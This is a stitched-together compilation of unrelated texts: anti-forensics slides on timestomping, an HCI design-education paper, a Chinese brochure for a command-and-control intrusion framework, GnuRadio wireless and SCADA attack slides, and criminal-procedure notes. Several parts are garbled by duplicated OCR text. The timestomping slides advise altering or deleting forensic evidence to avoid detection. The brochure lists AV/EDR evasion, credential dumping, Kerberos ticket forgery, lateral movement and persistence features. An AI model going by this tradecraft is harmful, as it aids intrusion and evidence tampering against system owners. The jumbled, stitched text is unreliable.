with respect to MFT. Example Timestamps matching the OS release date. Remember: forensic timelines are built on context. Running executables can leave a trail in the Windows Prefetch and the Registry (MRU) The problem with the Windows Prefetch… A Wi d P f t h fil ( f) h i ht ti t A Windows Prefetch file (.pf) has eight time stamps ($STANDARD_INFORMATION, $FILE_NAME). There is also an embedded timestamp There is also an embedded timestamp  of the last time the executable was run. 08/19/09 01:22:19PM If th i f t bl d t b d t lthil If the running of an executable needs to be done stealthily, the timestamps in the Prefetch file need to be modified, or the Prefetch file needs to be deleted entirely. The MRU values in the Registry Modified Registry entries Stored in ROT‐13 Data files can be a problem as well. What happens when a file is created or opened? Created files will have a shortcut Created files will have a shortcut  in the Windows Recent directory. (8 timestamps) .lnk If it’s an Office file, there will be a  shortcut in the Office’s Recent directory. (8 timestamps) .lnk Creating or  opening a file (8 timestamps) Many applications keep a list of recent  files on a menu. Data can be stored in File has 8  timestamps files on a menu. Data can be stored in  the Windows Registry (NTUSER.DAT). (Sometimes the keys have dates.) The file’s name could appear in the  Windows Prefetch file, which monitors  the system for up to 10 seconds. (9 timestamps) .pf (9 timestamps) Example Opening an accounting spreadsheet. Adobe Acrobat’s list of  recently opened PDFs. NTUSER.DAT\Software\Adobe\Acrobat Reader\7.0\AVGeneral\cRecentFiles\ Granularity NTFS stores time in 64 bit values, which gives an accuracy down to  , g y 100 nanoseconds since January 1, 1601. Timestomp.exe and Magic Attribute only go down to the nearest second. If the values in the attributes are examined, timestomping will be obvious… …unless an existing timestamp value is copied into the attribute. g p p (Don’t stomp it outright, copy it from another source.) Example Rounded timestamp values Bottom Line: It’s damn near impossible to change all of the timestamps d h bl associated with running an executable. Change (or delete) enough data to avoid detection. Want a copy? gimmethepresentation@gmail.com Time ^ estomping time
Sketchtools: Prototyping Physical Interaction Matt Cottam Tellart and Rhode Island School of Design 27 Sims Avenue, Providence, RI 02909 USA matt@tellart.com Abstract Industrial designers working in traditional media have the luxury of sketching, playing, and experimenting with their materials before constructing a finished product. Designers working with electronics and computers are relatively impoverished. To “sketch” with electronics or computers would typically require extensive training in engineering and ready access to inexpensive parts—requirements that most designers can’t easily meet. This deficiency—this inability to work closely with materials before building with them—hampers designers’ efforts to make products sensitive to human use. This paper describes an attempt to address this problem in a human-computer interaction (HCI) design studio at a major design school. The course itself was an exercise in design: it worked within severe constraints to address a human need. We describe our attempt to shape the course to meet students’ most pressing needs; our students’ attempts to work within the constraints of the course; and the outcomes of the course for students and faculty. The paper suggests that the course offers one way to experiment with HCI concepts, produce innovative solutions to design problems, and—crucially—humanize new technologies and the design process. 1 Problem Statement How can industrial design (ID) students in a human-computer interface design studio course use electronics and computers with the same speed, fluidity, and fearlessness afforded by less expensive and more flexible materials? How can the studio encourage students to be sensitive to human need—and to the complicated material and programmatic elements of their media? How can the studio create an environment in which students can use computer hardware and software as sketch materials? How can industrial designers extend their knowledge of engineering without encroaching on the work of engineers? How can an HCI studio balance an exploration of technology with a commitment to human-centered design? How can the course itself be approached as a design problem? 2 Background 2.1 Team Members Matt Cottam, Nicholas Scappaticci, Brian Hinch, The Department of Industrial Design (ID) and The Digital Media Graduate Program (DM) at Rhode Island School of Design (RISD), RISD ID and DM Students 2.2 Project Dates and Duration Courses: RISD ID: HCI Studio, 2001-2003 Fall Semesters; RISD DM: The Experimental Physical Interface, 2004 Spring Semester; RISD ID Simulation Studio: Combat Medic Training Simulator (COMETS) (with the Simulation Group at the Center for Integration of Medicine and Innovative Technology (CIMIT), Massachusetts General Hospital, Summer, Fall, and Spring Semesters 2004-2005; Umeå Institute of Design (Umea, Sweden): Tangible Interface Design, Winter 2005; RISD ID and DM: Microsoft Research: Design Expo Studio, Spring Semester 2005. 3 History and Context The model for this studio curriculum was developed and tested in American and Swedish graduate and undergraduate departments of industrial design and digital media. Tellart, a design consultancy owned and operated by the faculty of this course, developed and donated many of the ideas and tools involved with the course. 4 Challenge In the development of this studio course, the department, faculty, and students worked within numerous political, economic, intellectual, and technological constraints. These included: • students with varying experience in digital technologies; • the cost and complexity of electronics as raw materials for rapid and fluid design concept sketching; • the learning curve involved with computer programming for the ID student developing HCI concepts; • departmental budgets for computer hardware and software tools and materials; • institutional control over computer labs, servers, software purchases, and installations; • the environmental impact of sketching with plastic and silicon-based materials (sketch models are often modified and discarded as design concepts develop). The challenge of the course was to work within these constraints and still humanize the educational experience, the design process, and the technologies used in the course. 5 Solution 5.1 Process When we first contemplated the course, we started with what seemed a simple question: How can an ID student sketch efficiently and effectively for HCI concepts using computer hardware and software? Because we have taught the course several times, revising it each time, the shape and nature of the course have changed significantly. Still, we always worked within the rough parameters of the standard design workshop: class time was spent on demonstrations by faculty, field trips, guest lectures, discussions and critiques of exercises, short assignments, and a final project. Our task was to humanize the process—to turn our students’ attention toward human need, and to allow them to experiment with their materials in a way that enhanced their understanding of HCI issues. In this section we’ll describe the process of refining the conceptual design of the course; in the following section we’ll describe in detail the ways in which we adapted our use of technology in the studio to meet students’ needs. In the first iteration of the course, we asked students to work in teams of three on a broad conceptual problem: Design a human-computer interaction about an unmediated human experience in nature. This approach—team-based and abstract—was designed to ease students into the course material, to encourage collaboration, and to prompt playful, creative experimentation. What happened? The students struggled to balance what seemed to be competing needs: to work in conceptual terms and to design useful, human-centered products. Students were eager to make finished products—and voluntarily spent a good deal of money on materials with which to make them. (This proved to be doubly frustrating. Because they worked in teams, no one member could claim the final product.) But the problem we had given them was vague enough that they weren’t able to make use of their existing knowledge or to explore more advanced ideas about human need, use value, and the manufacturing process. The nature of the assignment also came to frustrate the professors: our evaluations were necessarily more subjective than we had hoped. Finally, because students couldn’t customize or miniaturize many of the electronics and hardware components, they designed installation-size projects (10’x10’x10’)—an approach that absorbed too much studio space and forced them to begin the labor of production too early, cutting short their time for experimenting. We had, in fact, encouraged them to use installations; we thought that form would expand the range of input possibilities. In the second iteration of the course, we asked students to work on a more concrete problem, and we did away with mandatory group work for the final project. Our assignment was: Design models and documentation for an interactive product that will serve a human need. We asked for looks-like and works-like models and Web-based documentation, and this proved to be a major advancement. Rather than trying to miniaturize electronics and code and build finished prototypes, students spent more time on research and experimentation. They focused on the scope of human factors, the capabilities of their technologies, and the challenge of communicating their concepts in a compelling, efficient form. The students seemed relieved not to have to worry about group dynamics. One significant problem: Because their solutions were so diverse, they couldn’t take full advantage of our critiques; the projects didn’t lend themselves to comparison. Figure 1. Students acting out interaction scenarios with a “works-like” model In the third iteration of the course, we asked students to design an interactive digital product for use by a human in an extreme environment—an even more specific task that led to more focused discussions and a concentrated use of materials. It also forced students to consider more carefully than before two key issues: human use and environmental conditions. Students also took advantage of inexpensive new computer input/output technologies, including software developed by our firm, Tellart, and hardware developed by Making Things. Now their material palette became expansive: they could work with analog sensory data input and analog voltage output. Rather than using switches to control content, they could use continuous analog sensing (sensors that track motion, touch, etc.). And with analog voltage output, they could control any electrical appliance—not simply audio and video content. We also encouraged them to consider networked products—products that can communicate with each other, and stable input controls that manage the content of Web pages and electrical appliances in various locations. The course in its current form is the result of a series of conceptual, pedagogical, and technological refinements, each related to the other. A conceptual adjustment was necessarily a pedagogical adjustment, which was necessarily a technological adjustment. In a way, this may be one of the course’s significant lessons: no idea, no action, no material exists in isolation. To conceive of a project, to study it, to work with its materials—these activities are parts of a whole. 5.2 Solution Details In this section, we describe our use of technology in the course. As we suggested above, every technological refinement affected the conceptual design of the course, our pedagogical approach to the course, and our students’ outcomes. The first iteration of the studio experience began with an act of destruction: students took apart discarded off-the- shelf computer hardware—keyboards, mice, game controllers. This was also an act of creation: the electronic components became raw material for sketch-modeling. Why use salvaged hardware? First, it allows greater freedom to experiment. The parts have been donated or found in the garbage; students are relieved of the stress of working with expensive materials. Second, it makes smart use of environmental and financial resources. Plastic and silicon parts are given at least one additional use and then recycled; and already limited course budgets and lab fees can be put toward field trips, books, and other materials. Third, it’s an exceptionally flexible learning tool. An extracted keyboard controller can be quickly and easily modified to respond to an array of inexpensive industrial sensors and switches, as well as custom concept switches created by students. Simple input hardware—keyboards and mice—don’t require special software drivers or computer ports, and they work with most computers and operating systems. Using standard hookup wire and simple soldering tools, students can incorporate controllers, sensors, and switches into models built in wood, metal, plastic, glass, textile, and other workshops. The models can then be connected to computer hardware via USB and can serve as multi-sensory input devices for Digital Signal Processing (DSP) and other software applications. We also relied on software sketching materials. Students used Macromedia Flash MX2004 and ActionScript to capture data from input devices (keypresses and cursor coordinates), script for DSP, and author audio and visual interface and content elements. Flash files (SWFs) can be published on the Web and can link to other Web sites and datasources while receiving user input from an experimental physical interface; Flash can also be used to publish Web-based design documentation. Flash is commonly installed as core software at art and design schools; it has a vast user base and is the subject of a number of instructional books and Web sites. ActionScript is an accessible, multi-purpose, and powerful object-oriented scripting language—ideal for experimentation. Figure 2. Modifying a keyboard controller (wired and wireless) These were the tools we relied on in our original version of the course: sketch-modeling with discarded hardware, and software sketching with Flash. We chose them because they were accessible, easy to use, and environmentally sound—and because they allowed students to work directly with the media, forcing them to be sensitive to its possible use. These tools were helpful but limited. We could build multi-sensory physical input devices that would control content on a screen, in speakers, and on the Web—but the Flash Player limited the ways in which data could be received from and sent to hardware. Also, a modified keyboard allowed us only binary input (“A” key is “down,” or “A” key is “up”). We wanted our students to have more: more technological options, more possibilities as designers and thinkers. Figure 3. Hardware and software system using a modified keyboard controller We started testing popular software solutions. Cycling 74’s Max/MSP allowed for greater flexibility in input and output data channels, and connected easily with popular analog and digital (A/D) converters (Teleo, iCube, etc.). But in the end, we stayed with Flash. It’s highly accessible to designers (Max—and especially MSP—was originally intended for computer music applications). It has a free and ubiquitous player and an internationally standardized object-oriented scripting language—a subset of ECMAScript (ISO/IEC 16262) and a good starting point for students eager to learn other programming and scripting languages. It can be used for drawing, typesetting, animating, controlling audio and video playback and effects, streaming audio, video, and vector graphics. It facilitates easy Web publishing; is easily integrated with Web applications; comes with a built-in XML object and socket; features pre-built components that allow for rapid prototyping; and, last but not least, it was already installed on our students’ laptops. There was one major problem: How could we connect Flash with popular A/D converters? We worked with the staff of our consulting firm to explore solutions. Our first attempt was an elaborate system involving analog sensors; Teleo Analog In; Power and USB modules; a computer with Linux, Apache, JRUN and a Java-based XML server (FLOSC) installed; a Max Patch; and a Flash SWF that could send and receive XML and had some graphical buttons and sliders. Incredibly, it worked. At least it allowed us to control an animation on a Web site from an analog bend sensor, and to control an electrical motor by dragging a slider in the Flash movie. But it was an overly complex and inefficient composition of hardware and software elements. Our next stage of development was to try and streamline the signal flow between analog sensors (bend, touch, heat, motion, proximity, etc.) and a Flash Movie, and between a Flash Movie and electrical devices (motors, lights, thermostats, heating elements, etc.). Our design consultancy built a platform-independent application in Java, called NADA, to allow more direct communication between A/D converters and Flash. This software is currently being used in the our courses, as well as at several schools internationally. Figure 4. Hardware and software system using analog and digital converters 6 Results Since the course was first offered, in 2001, we have seen a material change in its fortunes—and our own. The course has been over-enrolled; the waiting list exceeds three times the classroom capacity. Past students enroll in courses with the same faculty. A short video has been published about the course methodology. Other departments at RISD have agreed to partner with the industrial design department to offer a similar course. We have been invited to lecture at other institutions about the topics covered in the course. And Tellart has received contracts to apply the course’s methods and tools to projects for clients. None of these were explicit goals of the course; we didn’t design the course in order to achieve them. But together they suggest that the course offers a meaningful, practical approach to HCI issues in a design studio—and beyond. The goals of the course were to allow students to sketch in an unwieldy medium—the better to design solutions to specific human needs. In other words, we wanted to humanize the studio, the student, the technology, and the design process. In truth, our success is not easily measured. We can point to our students’ projects, many of which showed a remarkable awareness of human use and environmental impact, or demonstrated exceptional skill in handling materials or developing concepts. And we can point to our course materials, which (we hope) became more helpful with each new session. But we would expect to have some talented students; and we would expect to provide every student with the most useful supporting materials. Perhaps the best way to measure the outcome of the course is to talk in broad strokes about what we saw in the studio. We saw students sketch with actual hardware and software—a process that allowed them to develop a vocabulary that bridged the gap between designers and computer engineers. We exposed them to specific technologies at specific times, with the aim of easing them into the science of their work. We developed demonstrations and exercises and assignments—using computer hardware and software—that followed a studio practice and a design process that they were already familiar with. We worked with each new technology ourselves, and we changed it to adapt to the needs of each new class of students. We made the engineering side of HCI design seem familiar, personal, possible. We saw students design more robust products—because they understood their media at a deeper, more detailed level. They went beyond the color and shape of a plastic housing; they examined hardware components and software logic—enough to understand the qualities and capabilities of digital technologies. The most obviously useful outcome of this process was that they could design more sensitively shaped housings and human interfaces. They knew which questions to ask. Will the product require a lot of electrical power? Will it be heavy, or could it be light enough to be handheld? Will it cost a million dollars to make something that could reasonably be sold for one dollar? Will it require hard wiring to a wall outlet or to Ethernet? If it’s wireless, what other components will be required? All of these questions affect the form and use of a product. If students have a solid understanding of them and the vocabulary that comes with them, they can more effectively communicate with engineers and develop more useful and robust products. Form really can follow function. Finally, we saw students—equipped with a basic understanding of computer programming—research and design with a sensitivity to both sides of human-computer interaction: cognitive and computational. They learned basic principles like conditional logic: if this button is pressed, then turn on this light bulb; if this button is pressed in combination with another button, then play this video and turn on the light bulb. And that knowledge allowed them to design interactive scenes: when I input this information to the computer, it will interpret that information in this way and output this (these) response(s). Students wrote—as text narratives, not code—and physically acted out such scenes in class, a process that allowed them to develop concepts and make further discoveries though working and playing with coding sketch models. Students, in the end, saw the design process more clearly. The course removed several layers of abstraction between process and product—between designing an interactive product and seeing it manifested as an object in a human environment. And it removed several dense layers of engineering study—technical knowledge that often prevents students from seeing clearly to the human experience of the product. Students explored the cognitive, social, technological, and economic factors involved in designing digital products. They did it through experience; they did it with a sound introduction to engineering and programming; and they did it, always, with an awareness of human need. Tellart, through it's Sketchtools Division (sketchtools.com), now offers NADA software and physical interface design workshops to schools and professionals. Our goal is to continue bridging design and engineering disciplines, and providing students and professionals with new means for thinking (sketching), designing and engaging their audiences with articulate and meaningful forms. 7 Acknowledgements Special thanks to: Krzysztof Lenk who inspired me to teach; Mischa Schaub of Hyperwerk for first inspiring this work; Andreas Krach for helping me hack my first keyboard; RISD for encouraging and supporting this course development; Tellart for allowing us to do what we love at work; Nick Scappaticci—my trusty Tellart co-founder; Brian Hinch for leading the development of NADA and making the diagrams for this paper; Jasper Speicher for all the electronics lessons and teaching collaboration; Ryan Scott Bardsley for believing in the potential in bridging design and engineering and leading the COMETS project with RISD; Rob Morris for his editorial help in making this paper make sense; and all of our students for all of their bravery, work, and inspiration. References McCullough, M. (1996). Abstracting Craft: The Practiced Digital Hand, Reprint Edition. Cambridge: MIT Press. Cooper, A. (1999). The Inmates Are Running the Asylum: Why High Tech Products Drive Us Crazy and How to Restore the Sanity, 1st Edition. Indianapolis: SAMS. Laurel, B. (1990). The Art of Human-Computer Interface Design. Reading: Addison-Wesley Publishing Company. Tilley, A.R., Henry Dreyfuss Associates (2001). The Measure of Man and Woman: Human Factors in Design. Indianapolis: John Wiley & Sons. Sketchtools (NADA). http://www.sketchtools.com Tellart. http://www.tellart.com Rhode Island School of Design. http://www.risd.edu Macromedia Flash MX2004 and ActionScript. http://www.macromedia.com Making Things (Teleo). http://www.makingthings.com Cycling 74. http://www.cycling74.com Infusion Systems. http://www.infusionsystems.com Open Sound Control (OSC). http://www.cnmat.berkeley.edu/OpenSoundControl FLOSC. http://www.benchun.net/flosc Umeå Institute of Design. http://www.dh.umu.se Simulation Group, Center for Integration of Medicine and Innovative Technology, Massachusetts General Hospital. http://www.medicalsim.org
CSerV2 Final 版产品介绍 产品名称:CSer C2 适用操作系统平台:Windows 注:新版本增改内容,详见文中红字部分及最后一页的更新记录。 产品简介: 1、 采用 C/T/B 架构,即 Controller(控制端)、TeamServer(服 务器端)、Beacon(客户端) 三端,支持多用户在线,并实 时共享所有信息。 2、 Controller 端发布的任务,支持同步和异步两种方式:同步方 式可以实时的执行任务和查看任务执行结果;异步方式,则可 以实现类似于离线任务的效果,即 Controller 可以一次性下达 多个任务,Beacon 端会依次取出任务执行并将结果返回给 TeamServer。 3、 使用 Profile 定制化通讯协议,降低被特征化的机率。 4、 除了基本的管理功能外,还拥有大量的、适用于各种环境的渗 透测试模块,用于高效地辅助渗透测试。 产品特性: 1、 具备更为详细的信息收集功能、运行时环境探测,以及域内网 渗透相关功能。 2、 加强了 AV/EDR 对抗能力,同时对静态以及动态两方面进行了 处理优化,有效规避了常见 AV/EDR 的检测,在低成本情况 下,无需用户进行二次处理,即可达到较高的 ABU(Anti、 Bypass、Undetectable) 效果。 3、 Beacon 端拥有很高的稳定性和兼容性,可在不同版本的 windows 操作系统上稳定运行。 4、 提供了两种 Beacon 端持久化的方式:新的 COM 劫持方法以 及更加隐蔽的计划任务。 5、 提供了两种 Beacon 端植入模式:Solo L&C,即“手动植入模 式”,主要用于已获得初始访问权(比如交互式 shell)的场景 下使用;Solo D4All,即“下载者模式”,主要用于获取初始访 问权的场景。 6、 提供了一种一次性使用 Beacon 的方式(RunOnce,单次运行 模式), 用于临时需要使用的场景。 7、 重构了内存中的 C2profile,有效规避了 AV/EDR 的内存扫 描。 功能列表: 1、 对目标网站进行 Clone,为后续攻击进行准备工作 2、 将 TeamServer 临时作为 WebServer 来使用,供远程下载文 件 3、 提供探针功能,刺探访问者系统、浏览器等信息 4、 提供模版类型的鱼叉式钓鱼功能 5、 提供 SOCKS 代理功能 6、 内网端口扫描 7、 屏幕截图 8、 文件管理功能 9、 进程管理功能 10、 将 teamserver 与控制端进行分离,防止 teamserver 被入侵或 teamserver 所在机器运行防病毒软件时,导致核心功能丢失 11、 对通讯进行二次加密,防止流量被监控,降低被检测风险。 12、 系统基本信息,包括 CPU 信息、内存信息、GPU 信息、用户 名、机器名、IP 地址、MAC 地址等基础信息。 13、 系统服务信息,枚举系统服务信息。 14、 补丁信息枚举,同时通过补丁信息列出对应的漏洞 CVE 编 号。 15、 CLR 版本检测,枚举目标机器上的 CLR 版本。 16、 EDR 检测,检测目标机器上的 EDR 信息,并列出其版本、对 应的服务、其所在目录等信息 17、 虚拟机检测,通过各方面,包括 BIOS 信息、内存大小、注册 表、分辨率、CPU 温度等各种信息,来判断目标系统是否为虚 拟机 18、 运行时安全检测,检测杀软基本信息以及系统补丁基本信息, 列出杀软的名称以及安装目录,系统安装的补丁以及安装时 间。 19、 软件信息检测,检测目标机器上所安装的软件信息,内容包 括:软件名、版本号、软件开发公司、安装时间、安装目录、 架构等基本信息。 20、 运行时权限检测,包括检测 applocker 选项、UAC 选项、 Token 权限信息 21、 网络连接信息,包括 4 方面:目标机器 DNS 缓存信息、ARP 协议连接信息、TCP 协议连接信息、UDP 协议连接信息 22、 本地 hash 提取 23、 本地明文密码提取 24、 RDP 明文密码提取 25、 通过 lsass 进程获取密码 26、 域内 hash 提取 27、 域内 tickets 提取 28、 通过 RDP 协议远程执行命令 29、 通过 DCOM 远程执行命令 30、 无文件远程命令执行 31、 通过 SMB 远程执行命令 32、 通过 WinRM 远程执行命令 33、 通过 WMI 远程执行命令 34、 黄金票据 35、 白金票据 36、 LDAP 查询域内基本信息,内置部分查询语句 37、 票据传递 38、 域内基本信息收集 39、 新增了自定义的 TeamServer 以及 C2Profile 生成器。本地数据 库保存,方便随时读取修改。 40、 新增了全版本通用的 BypassUAC 以及 GetSystem 功能,使用 smart inject 自动挑选最佳的注入进程与方式 41、 minidump 允许用户通过 PID 或进程名 dump 任意进程,并自 动加密压缩保存,允许用户自动下载,并配备对应解密工具。 42、 新的 Beacon 生成器。 对 beacon 做了全方位的 ABU(免杀)处理,极大增强了其对 抗 AV/EDR 的能力,并增加了如下三种运行模式。 <1>、Solo L&C 手动植入模式 由 Installer、Loader、Core 三端组成,需要手动进行安装等 操作,具备持久化能力。 适用于已拥有初始访问权(比如 webshell 或者反弹 shell),需 要对其进行持久化控制的场景。 注:三端模式主要是为了对抗云查杀,提高存活率。 <2>、Solo D4All 下载者模式(2.0.1 版本新增) 只有 Downloader 一个 DLL,可以自动化选择可联网进程, 并将对应平台版本的 Installer、Loader、Core 等核心文件拉 回到内存并执行,具备持久化能力。 注:下载者模式会自动连接到 team server 端拉取 beacon 核 心文件,主要用于打点或者横向移动。 <3>、RunOnce 单次运行模式 不具备持久化能力,主要用于需要临时上线操作的场景。 AV/EDR 测试结果: AV/EDR 名称 静态免杀测试 动态免杀测试 Kaspersky √ √ Avira Antivirus √ √ McAfee √ √ Norton √ √ Windows Defender √ √ 火绒 √ √ ESET √ √ 趋势科技 √ √ avast √ √ 更新记录: • 2.0 final 版本新增内容(2022/7/5) o 通讯协议增加对 DNS、SMB 的支持。 o 回连模式中除了传统的 DNS 解析模式,新增了 URL 解 析模式,用于域名白名单封锁等场景。 o Beacon 新增运行时变形机制,极大增强其运行时(内 存)存活率。 o 优化现有的 EDR 对抗机制,增加了新的对抗手段,适用 性更加广泛。 o 增强进程注入机制,添加了新的绕过 EDR/HIPS 的注入 方式。 o 管理数据库中保存的功能执行结果。 o Beacon Builder 配置管理。 导出功能:将当前三种模式下的配置保存到 Json 文件中供 后续使用。 导入功能:将之前导出的配置文件导入到当前配置项。 保存功能:将当前配置保存到数据库,供下一次直接取 出。 o 新增导出函数克隆功能,可配合 lolbins 加载执行使用。 o 新增 c2profile 导入功能,暂支持由 TeamServer Builder 导出的 c2profile。 o Beacon Builder 新增 RunOnce 下 exploit 模式。 • 2.0.1 版本新增内容(2021/12/21) o 增加了新的 ABU 特性,可绕过 beaconEye 和 cobaltstrikeScan 等通过 yara 规则对内存进行扫描的工具 以及最新版 Windows Defender 等 AV/EDR。 o 增加了新的植入模式:D4All(下载者模式),用于获取 初始访问权(打点)的场景。 o 优化 Controller 端代码,运行更加流畅。 o 优化 Beacon 端代码,增加了新的 EDR 对抗机制。
Hacking With GnuRadio Hacking With GnuRadio How to have fun with wireless transmissions! David M. N. Bryan David M. N. Bryan ●Info Security Consultant Info Security Consultant ●CISSP CISSP ●HAM HAM ●Hacker Hacker ●DEFCON DEFCON Hacker Spaces!!! Hacker Spaces!!! Thanks to CCCKC – Sweet Hacker Space! Thanks to CCCKC – Sweet Hacker Space! What is this? What is this? Is that a hot pack in your pocket? Is that a hot pack in your pocket? Physical Attack Physical Attack Physical Attack Physical Attack Physical Attack Physical Attack Counter Measures ? Counter Measures ? Mind the gap! Mind the gap! Disable the use of RTE Disable the use of RTE Crash bar Crash bar Push to exit Push to exit Hacking With GnuRadio Hacking With GnuRadio What is GnuRadio? What is GnuRadio? What you need What you need Requirements Requirements Costs Costs What is GnuRadio? What is GnuRadio? Software – Python = byte code = good! Software – Python = byte code = good! Hardware - Hardware - Universal Software Radio Peripheral Universal Software Radio Peripheral Field Programmable Gate Array Field Programmable Gate Array 4 DAC 4 DAC 4 ADC 4 ADC TX / RX Daughter boards from 0.1Mhz to 5.8Ghz TX / RX Daughter boards from 0.1Mhz to 5.8Ghz USRP v1.0 USRP v1.0 USRP Board USRP Board Daughter Boards Daughter Boards How Can I use it? How Can I use it? Get Hardware – USRP Get Hardware – USRP Install Ubuntu – or other Unix like OS Install Ubuntu – or other Unix like OS USRP Interface Requirements USRP Interface Requirements v1.0 USB 2.0 v1.0 USB 2.0 v2.0 Gigabit Ethernet v2.0 Gigabit Ethernet Why should I use it? Why should I use it? Wireless Signal Receiving and Generation Wireless Signal Receiving and Generation Circuit logic Circuit logic Oscillator Oscillator Other methods are painfully slow for prototyping Other methods are painfully slow for prototyping Cost Cost USRP1 $700 USRP1 $700 USRP2 $1400 USRP2 $1400 Daughter Boards $75-$400 Daughter Boards $75-$400 Screws/Case $20 Screws/Case $20 Not specifically FCC Part Licensed Not specifically FCC Part Licensed Owning your neighborhood SCADA- Priceless! Owning your neighborhood SCADA- Priceless! So what can we do with it? Wireless Attacks Wireless Attacks RFID Payment Cards RFID Payment Cards Global System Mobile (GSM) Global System Mobile (GSM) Bluetooth (Frequency Hopping) Bluetooth (Frequency Hopping) Multiple Access System (MAS) Multiple Access System (MAS) RFID Attacks RFID Attacks RFID Tag reading RFID Tag reading Boston Subway Hacks Boston Subway Hacks MiFare Card Attacks MiFare Card Attacks Long Range Tag Reading Long Range Tag Reading GSM Attacks GSM Attacks wiki.thc.org – A5 GSM Cracking wiki.thc.org – A5 GSM Cracking Base station – call routing? Base station – call routing? Cell free zone? Cell free zone? Bluetooth Attacks Bluetooth Attacks Frequency Hopping Spread Spectrum Frequency Hopping Spread Spectrum Follow “hop” patterns Follow “hop” patterns USRP V2 Only – v1 lacks bandwidth USRP V2 Only – v1 lacks bandwidth Using 8 v2 USRPs Using 8 v2 USRPs MAS System MAS System Multiple Access System Multiple Access System Computer Applications in Power, IEEE Computer Applications in Power, IEEE Volume 5, Issue 4, Oct 1992 Page(s):29 - 32 Volume 5, Issue 4, Oct 1992 Page(s):29 - 32 Digital Object Identifier 10.1109/67.160043 Digital Object Identifier 10.1109/67.160043 Summary:The use of 900 MHz radio for Summary:The use of 900 MHz radio for supervisory control and data acquisition supervisory control and data acquisition applications was investigated by the Houston applications was investigated by the Houston Lighting and Power Company (HL&P). Multiple Lighting and Power Company (HL&P). Multiple address system applications in the 928/952 address system applications in the 928/952 MHz band were evaluated. (etc....) MHz band were evaluated. (etc....) MAS System Attacks MAS System Attacks Simple 1992's Repeater Simple 1992's Repeater Repeater Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Head End Head End MAS System Attacks MAS System Attacks Request Status Request Status Repeater Omni Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Head End Head End Input Freq MAS System Attacks MAS System Attacks Status Reply Status Reply Repeater Omni Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Head End Head End Input Freq MAS System Attacks MAS System Attacks Request Status Request Status Repeater Omni Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Head End Head End Input Freq Input Freq Evil Hax0r Evil Hax0r MAS System Attacks MAS System Attacks Request Status Request Status Repeater Omni Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Head End Head End Input Freq Evil Hax0r Evil Hax0r Input Freq USRP - First Attempt USRP - First Attempt MAS System Attacks MAS System Attacks Request Status Request Status Repeater Omni Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Head End Head End Input Freq Evil Hax0r Evil Hax0r Input Freq USRP - Second Attempt USRP - Second Attempt MAS System Attacks MAS System Attacks Request Status Request Status Repeater Omni Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Head End Head End Input Freq Evil Hax0r Evil Hax0r Input Freq USRP - Third Attempt USRP - Third Attempt USRP - Third Attempt USRP - Third Attempt USRP - Third Attempt USRP - Third Attempt USRP - Third Attempt USRP - Third Attempt USRP - Third Attempt USRP - Third Attempt USRP - Third Attempt USRP - Third Attempt MAS System Attacks MAS System Attacks Request Status Request Status Repeater Omni Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Yagi Ant Head End Head End Evil Hax0r Evil Hax0r Input Freq MAS Radio Issues MAS Radio Issues Wide Open Wide Open No Authentication No Authentication No Integrity No Integrity Single In / Multiple Out “Repeater” Single In / Multiple Out “Repeater” Poor Design Poor Design MAS Radio Fixes MAS Radio Fixes Use encryption Use encryption Use 802.11 type networks Use 802.11 type networks Use routing protocol for link failures Use routing protocol for link failures Out of band management Out of band management Demo ? Demo ? How Can I Contribute? How Can I Contribute? Join a hacker space Join a hacker space Post Post Play Play Have Fun! Have Fun! Thank you! Thank you! My wife, Heather My wife, Heather References References www.gnuradio.org www.gnuradio.org http://www.ettus.com/ http://www.ettus.com/ www.ece.vt.edu/swe/chamrad/crdocs/CRTM09_060727_USRP.pdf www.ece.vt.edu/swe/chamrad/crdocs/CRTM09_060727_USRP.pdf http://www.gnu.org/software/gnuradio/doc/exploring-gnuradio.html http://www.gnu.org/software/gnuradio/doc/exploring-gnuradio.html http://www.blackhat.com/presentations/bh-europe-08/Steve-DHulton/Whitepaper/bh-eu-08-steve-dhulton-WP.pdf http://www.blackhat.com/presentations/bh-europe-08/Steve-DHulton/Whitepaper/bh-eu-08-steve-dhulton-WP.pdf http://dc4420.org/files/dominicgs/bluesniff_slides.pdf http://dc4420.org/files/dominicgs/bluesniff_slides.pdf http://www.rfidhackers.com/ http://www.rfidhackers.com/ http://en.wikipedia.org/wiki/Universal_Software_Radio_Peripheral http://en.wikipedia.org/wiki/Universal_Software_Radio_Peripheral
Police Criminal Procedure Professor Steve Dunker When Can the Police Make a Stop? An Officer MUST have either: Reasonable Suspicion OR Probable Cause Reasonable Suspicion “Quantum of knowledge sufficient to induce an ordinarily prudent and cautious man under similar circumstances to believe criminal activity is at hand” (Black’s) 25%+ sure Probable Cause “The facts and circumstances within the officers’ knowledge and of which they had reasonably trustworthy information are sufficient in themselves to warrant a man of reasonable caution in the belief that an offense has been or is being committed.” More than 50% sure The Totality of the Circumstances Look at All the information available Such as: Conduct of suspect Incriminating evidence Confessions or admissions Unusual hour Witnesses Answers to questions When can an officer “Frisk” Reasonably believe criminal activity is afoot. And The suspect may be armed and dangerous What is a “Frisk” Pat-Down for weapons Looking ONLY for weapons “Plain touch” contraband may be seized. When Must the Police Inform you of Your Rights? In Custody Under Interrogation Traffic stops do not require Miranda What are your Rights? Remain Silent Any you say will be used against you You have a right to an attorney If you cannot afford an attorney one will be appointed Searches What is a search? Govt. Agent – Invasion of your privacy Reasonable Expectation of Privacy Search incident to an Arrest A valid arrest allows for the search of the person and of the area surrounding the suspect. Motor Vehicle Searches Search of Automobile does not require a warrant. Probable cause is required May examine all containers that could contain evidence. When can the police “Kick” your door in without Knocking First? Knock and Announce Required Exceptions: Safety or Destruction of evidence The Exclusionary Rule Court Rule Barring Use of Illegally Obtained Evidence Illegal search = No use of evidence in Court. Questions for the Criminal Justice Professor…… Must be hypothetical Hypothetical = Made-up, Make believe
